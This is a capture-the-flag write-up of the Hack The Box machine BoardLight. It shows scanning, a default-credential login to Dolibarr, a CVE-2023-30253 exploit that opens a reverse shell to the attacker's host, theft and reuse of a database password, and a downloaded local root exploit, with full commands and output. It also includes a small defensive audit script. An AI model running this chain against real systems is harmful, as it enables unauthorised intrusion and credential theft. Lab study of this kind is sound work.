
HTB BoardLight done

BoardLight

OS:

Linux

Technology:

JQuery[3.4.1]
Dolibarr 17.0.0

IP Address:

10.10.11.11

Open ports:

22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))

Users and pass:

Login to website: http://crm.board.htb/index.php
L: admin
P: admin
---
From file: ./crm.board.htb/htdocs/conf/conf.php
$dolibarr_main_db_host='localhost';
$dolibarr_main_db_port='3306';
$dolibarr_main_db_name='dolibarr';
$dolibarr_main_db_prefix='llx_';
$dolibarr_main_db_user='dolibarrowner';
$dolibarr_main_db_pass='serverfun2$2023!!';
---
SSH login for user: larissa
L: larissa
P: serverfun2$2023!!

Nmap

┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_BoardLight]
└─$ sudo nmap -A -sV --script=default -p- -oA 10.10.11.11_nmap 10.10.11.11 ; cat 10.10.11.11_nmap.nmap | grep -E "^[0-9]{1,}/(tcp|udp)"
[sudo] password for kali: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-12 11:08 UTC
Nmap scan report for 10.10.11.11
Host is up (0.035s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 06:2d:3b:85:10:59:ff:73:66:27:7f:0e:ae:03:ea:f4 (RSA)
|   256 59:03:dc:52:87:3a:35:99:34:44:74:33:78:31:35:fb (ECDSA)
|_  256 ab:13:38:e4:3e:e0:24:b4:69:38:a9:63:82:38:dd:f4 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.41 (Ubuntu)

Add IP to /etc/hosts

┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_BoardLight]
└─$ cat /etc/hosts | grep board                           
10.10.11.11 board.htb

ffuf - http://board.htb

┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_BoardLight]
└─$ ffuf -u http://board.htb/FUZZ -c -w /usr/share/wordlists/dirb/big.txt -ac -recursion -recursion-depth=1 -o board.htb_ffuz -of all -e .php,.html,.txt,.bac,.backup

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://board.htb/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirb/big.txt
 :: Extensions       : .php .html .txt .bac .backup 
 :: Output file      : board.htb_ffuz.{json,ejson,html,md,csv,ecsv}
 :: File format      : all
 :: Follow redirects : false
 :: Calibration      : true
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

about.php               [Status: 200, Size: 9100, Words: 3084, Lines: 281, Duration: 35ms]
contact.php             [Status: 200, Size: 9426, Words: 3295, Lines: 295, Duration: 39ms]
css                     [Status: 301, Size: 304, Words: 20, Lines: 10, Duration: 42ms]
[INFO] Adding a new job to the queue: http://board.htb/css/FUZZ

do.php                  [Status: 200, Size: 9209, Words: 3173, Lines: 295, Duration: 59ms]
images                  [Status: 301, Size: 307, Words: 20, Lines: 10, Duration: 36ms]
[INFO] Adding a new job to the queue: http://board.htb/images/FUZZ

index.php               [Status: 200, Size: 15949, Words: 6243, Lines: 518, Duration: 40ms]
js                      [Status: 301, Size: 303, Words: 20, Lines: 10, Duration: 36ms]
[INFO] Adding a new job to the queue: http://board.htb/js/FUZZ

[INFO] Starting queued job on target: http://board.htb/css/FUZZ

[INFO] Starting queued job on target: http://board.htb/images/FUZZ

[INFO] Starting queued job on target: http://board.htb/js/FUZZ

:: Progress: [122814/122814] :: Job [4/4] :: 1069 req/sec :: Duration: [0:01:55] :: Errors: 0 ::

ffuf subdomain - http://FUZZ.board.htb

┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_BoardLight]
└─$ ffuf -u http://board.htb -H "Host: FUZZ.board.htb" -c -w /usr/share/wordlists/dirb/big.txt | grep -v "15949" | tee board.htb_subdomain_ffuz

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://board.htb
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirb/big.txt
 :: Header           : Host: FUZZ.board.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

:: Progress: [20469/20469] :: Job [1/1] :: 368 req/sec :: Duration: [0:00:54] :: Errors: 0 ::
crm                     [Status: 200, Size: 6360, Words: 397, Lines: 150, Duration: 61ms]

Add a new subdomain to /etc/hosts

┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_BoardLight]
└─$ cat /etc/hosts | grep crm                       
10.10.11.11 board.htb crm.board.htb

Open website: http://crm.board.htb

I found the software:
Dolibarr 17.0.0

I guessed the default creds:
L: admin
P: admin

Exploit: POC exploit for Dolibarr <= 17.0.0 (CVE-2023-30253)

[POC exploit for Dolibarr <= 17.0.0 (CVE-2023-30253)](https://github.com/nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253)

Download exploit

┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_BoardLight]
└─$ git clone https://github.com/nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253.git
Cloning into 'Exploit-for-Dolibarr-17.0.0-CVE-2023-30253'...
remote: Enumerating objects: 18, done.
remote: Counting objects: 100% (18/18), done.
remote: Compressing objects: 100% (16/16), done.
remote: Total 18 (delta 3), reused 0 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (18/18), 9.17 KiB | 2.29 MiB/s, done.
Resolving deltas: 100% (3/3), done.

Run exploit - revshell

┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_BoardLight]
└─$ netcat -lvnp 80  
listening on [any] 80 ...
connect to [10.10.14.25] from (UNKNOWN) [10.10.11.11] 52260
bash: cannot set terminal process group (889): Inappropriate ioctl for device
bash: no job control in this shell
www-data@boardlight:~/html/crm.board.htb/htdocs/public/website$ 
---
┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_BoardLight/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253]
└─$ python3 exploit.py http://crm.board.htb admin admin 10.10.14.25 80
[*] Trying authentication...
[**] Login: admin
[**] Password: admin
[*] Trying created site...
[*] Trying created page...
[*] Trying editing page and call reverse shell... Press Ctrl+C after successful connection

Find creds in file: ./crm.board.htb/htdocs/conf/conf.php

I found creds for MySQL:
$dolibarr_main_db_host='localhost';
$dolibarr_main_db_port='3306';
$dolibarr_main_db_name='dolibarr';
$dolibarr_main_db_prefix='llx_';
$dolibarr_main_db_user='dolibarrowner';
$dolibarr_main_db_pass='serverfun2$2023!!';
---
www-data@boardlight:~/html$ find . -name "conf.php" 2>/dev/null
find . -name "conf.php" 2>/dev/null
./crm.board.htb/htdocs/conf/conf.php
www-data@boardlight:~/html$ cat ./crm.board.htb/htdocs/conf/conf.php
cat ./crm.board.htb/htdocs/conf/conf.php
<?php
//
// File generated by Dolibarr installer 17.0.0 on May 13, 2024
//
// Take a look at conf.php.example file for an example of conf.php file
// and explanations for all possibles parameters.
//
$dolibarr_main_url_root='http://crm.board.htb';
$dolibarr_main_document_root='/var/www/html/crm.board.htb/htdocs';
$dolibarr_main_url_root_alt='/custom';
$dolibarr_main_document_root_alt='/var/www/html/crm.board.htb/htdocs/custom';
$dolibarr_main_data_root='/var/www/html/crm.board.htb/documents';
$dolibarr_main_db_host='localhost';
$dolibarr_main_db_port='3306';
$dolibarr_main_db_name='dolibarr';
$dolibarr_main_db_prefix='llx_';
$dolibarr_main_db_user='dolibarrowner';
$dolibarr_main_db_pass='serverfun2$2023!!';
$dolibarr_main_db_type='mysqli';
$dolibarr_main_db_character_set='utf8';
$dolibarr_main_db_collation='utf8_unicode_ci';
// Authentication settings
$dolibarr_main_authentication='dolibarr';

//$dolibarr_main_demo='autologin,autopass';
// Security settings
$dolibarr_main_prod='0';
$dolibarr_main_force_https='0';
$dolibarr_main_restrict_os_commands='mysqldump, mysql, pg_dump, pgrestore';
$dolibarr_nocsrfcheck='0';
$dolibarr_main_instance_unique_id='ef9a8f59524328e3c36894a9ff0562b5';
$dolibarr_mailing_limit_sendbyweb='0';
$dolibarr_mailing_limit_sendbycli='0';

//$dolibarr_lib_FPDF_PATH='';
//$dolibarr_lib_TCPDF_PATH='';
//$dolibarr_lib_FPDI_PATH='';
//$dolibarr_lib_TCPDI_PATH='';
//$dolibarr_lib_GEOIP_PATH='';
//$dolibarr_lib_NUSOAP_PATH='';
//$dolibarr_lib_ODTPHP_PATH='';
//$dolibarr_lib_ODTPHP_PATHTOPCLZIP='';
//$dolibarr_js_CKEDITOR='';
//$dolibarr_js_JQUERY='';
//$dolibarr_js_JQUERY_UI='';

//$dolibarr_font_DOL_DEFAULT_TTF='';
//$dolibarr_font_DOL_DEFAULT_TTF_BOLD='';
$dolibarr_main_distrib='standard';
www-data@boardlight:~/html$ 
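As an added example (not part of this writeup), a small Python audit that parses a Dolibarr conf.php in the format shown above and flags the settings a defender would fix: the cleartext DB password (the same one that later works for larissa), prod and force_https left at '0'. SAMPLE_CONF is constructed from the values above; the finding texts are my own.

```python
import re

# Active setting line, e.g. $dolibarr_main_prod='0';  Lines commented out with //
# (like //$dolibarr_main_demo=...) deliberately do not match: they are inactive.
_SETTING = re.compile(r"^\s*\$(dolibarr_\w+)\s*=\s*'([^']*)'\s*;")

# Constructed sample, trimmed to the lines that matter from the conf.php above.
SAMPLE_CONF = """<?php
$dolibarr_main_db_user='dolibarrowner';
$dolibarr_main_db_pass='serverfun2$2023!!';
$dolibarr_main_authentication='dolibarr';
//$dolibarr_main_demo='autologin,autopass';
$dolibarr_main_prod='0';
$dolibarr_main_force_https='0';
$dolibarr_nocsrfcheck='0';
"""

def parse_dolibarr_conf(text: str) -> dict:
    """Return the active $dolibarr_* settings of a conf.php body as a dict."""
    settings = {}
    for line in text.splitlines():
        m = _SETTING.match(line)
        if m:
            settings[m.group(1)] = m.group(2)
    return settings

def audit_dolibarr_conf(settings: dict) -> list:
    """Return one finding per setting a defender would change."""
    findings = []
    if settings.get("dolibarr_main_prod") != "1":
        findings.append("dolibarr_main_prod is not '1': technical error details are shown to users")
    if settings.get("dolibarr_main_force_https") != "1":
        findings.append("dolibarr_main_force_https is not '1': logins may travel over plain HTTP")
    if settings.get("dolibarr_nocsrfcheck") not in (None, "0"):
        findings.append("dolibarr_nocsrfcheck disables CSRF protection")
    if settings.get("dolibarr_main_demo"):
        findings.append("dolibarr_main_demo enables demo auto-login")
    if settings.get("dolibarr_main_db_pass"):
        findings.append("dolibarr_main_db_pass is in clear text: restrict conf.php to the web server user "
                        "and never reuse it as an OS or SSH password")
    return findings

if __name__ == "__main__":
    for finding in audit_dolibarr_conf(parse_dolibarr_conf(SAMPLE_CONF)):
        print("[!]", finding)
```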

SSH login as user: larissa

www-data@boardlight:~/html$ su  larissa
su  larissa
Password: serverfun2$2023!!

larissa@boardlight:/var/www/html$ find / -name "user.txt" 2>/dev/null
find / -name "user.txt" 2>/dev/null
/home/larissa/user.txt
larissa@boardlight:/var/www/html$ 

Read flag: user.txt

larissa@boardlight:/var/www/html$ cd /home/larissa/        
cd /home/larissa/
larissa@boardlight:~$ ls -la
ls -la
total 76
drwxr-x--- 15 larissa larissa 4096 May 17 01:04 .
drwxr-xr-x  3 root    root    4096 May 17 01:04 ..
lrwxrwxrwx  1 root    root       9 Sep 18  2023 .bash_history -> /dev/null
-rw-r--r--  1 larissa larissa  220 Sep 17  2023 .bash_logout
-rw-r--r--  1 larissa larissa 3771 Sep 17  2023 .bashrc
drwx------  2 larissa larissa 4096 May 17 01:04 .cache
drwx------ 12 larissa larissa 4096 May 17 01:04 .config
drwxr-xr-x  2 larissa larissa 4096 May 17 01:04 Desktop
drwxr-xr-x  2 larissa larissa 4096 May 17 01:04 Documents
drwxr-xr-x  3 larissa larissa 4096 May 17 01:04 Downloads
drwxr-xr-x  3 larissa larissa 4096 May 17 01:04 .local
drwxr-xr-x  2 larissa larissa 4096 May 17 01:04 Music
lrwxrwxrwx  1 larissa larissa    9 Sep 18  2023 .mysql_history -> /dev/null
drwxr-xr-x  2 larissa larissa 4096 May 17 01:04 Pictures
-rw-r--r--  1 larissa larissa  807 Sep 17  2023 .profile
drwxr-xr-x  2 larissa larissa 4096 May 17 01:04 Public
drwx------  2 larissa larissa 4096 May 17 01:04 .run
drwx------  2 larissa larissa 4096 May 17 01:04 .ssh
drwxr-xr-x  2 larissa larissa 4096 May 17 01:04 Templates
-rw-r-----  1 root    larissa   33 Aug 12 04:06 user.txt
drwxr-xr-x  2 larissa larissa 4096 May 17 01:04 Videos
larissa@boardlight:~$ cat user.txt ; id ; ip a
cat user.txt ; id ; ip a
f3b8aaaff5d1fa279308ff039f57c8fd
uid=1000(larissa) gid=1000(larissa) groups=1000(larissa),4(adm)
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:94:30:6d brd ff:ff:ff:ff:ff:ff
    altname enp3s0
    altname ens160
    inet 10.10.11.11/23 brd 10.10.11.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 dead:beef::250:56ff:fe94:306d/64 scope global dynamic mngtmpaddr 
       valid_lft 86398sec preferred_lft 14398sec
    inet6 fe80::250:56ff:fe94:306d/64 scope link 
       valid_lft forever preferred_lft forever
larissa@boardlight:~$ 

Privilege Escalation

Exploit: CVE-2022-37706-LPE-exploit

[CVE-2022-37706-LPE-exploit](https://github.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit/blob/main/exploit.sh)

Download exploit

┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_BoardLight]
└─$ wget https://raw.githubusercontent.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit/main/exploit.sh
--2024-08-13 22:24:42--  https://raw.githubusercontent.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit/main/exploit.sh
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.110.133, 185.199.109.133, 185.199.108.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.110.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 709 [text/plain]
Saving to: ‘exploit.sh’

exploit.sh                    100%[==============================================>]     709  --.-KB/s    in 0s      

2024-08-13 22:24:42 (52.1 MB/s) - ‘exploit.sh’ saved [709/709]

Run exploit

* Upload exploit to remote host
---
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_BoardLight]
└─$ scp exploit.sh larissa@10.10.11.11:/tmp/
larissa@10.10.11.11's password: 
exploit.sh                                                                          100%  710    18.1KB/s   00:00   
---
larissa@boardlight:/tmp$ chmod a+x exploit.sh
larissa@boardlight:/tmp$ ./exploit.sh
CVE-2022-37706
[*] Trying to find the vulnerable SUID file...
[*] This may take few seconds...
[+] Vulnerable SUID binary found!
[+] Trying to pop a root shell!
[+] Enjoy the root shell :)
mount: /dev/../tmp/: can't find in /etc/fstab.
# 
# id
uid=0(root) gid=0(root) groups=0(root),4(adm),1000(larissa)

Read flag: root.txt

# cd /root
# 
# ls -a 
.  ..  .bash_history  .bashrc  .cache  .config  .dbus  .local  .mysql_history  .profile  .run  root.txt  snap
# 
# cat root.txt ; id ; ip a
3cc67d81fa7a4f2d3b3357ff1db64c51
uid=0(root) gid=0(root) groups=0(root),4(adm),1000(larissa)
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:94:30:6d brd ff:ff:ff:ff:ff:ff
    altname enp3s0
    altname ens160
    inet 10.10.11.11/23 brd 10.10.11.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 dead:beef::250:56ff:fe94:306d/64 scope global dynamic mngtmpaddr 
       valid_lft 86391sec preferred_lft 14391sec
    inet6 fe80::250:56ff:fe94:306d/64 scope link 
       valid_lft forever preferred_lft forever
# 

References

[POC exploit for Dolibarr <= 17.0.0 (CVE-2023-30253)](https://github.com/nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253)
[CVE-2022-37706-LPE-exploit](https://github.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit/blob/main/exploit.sh)

Lessons Learned
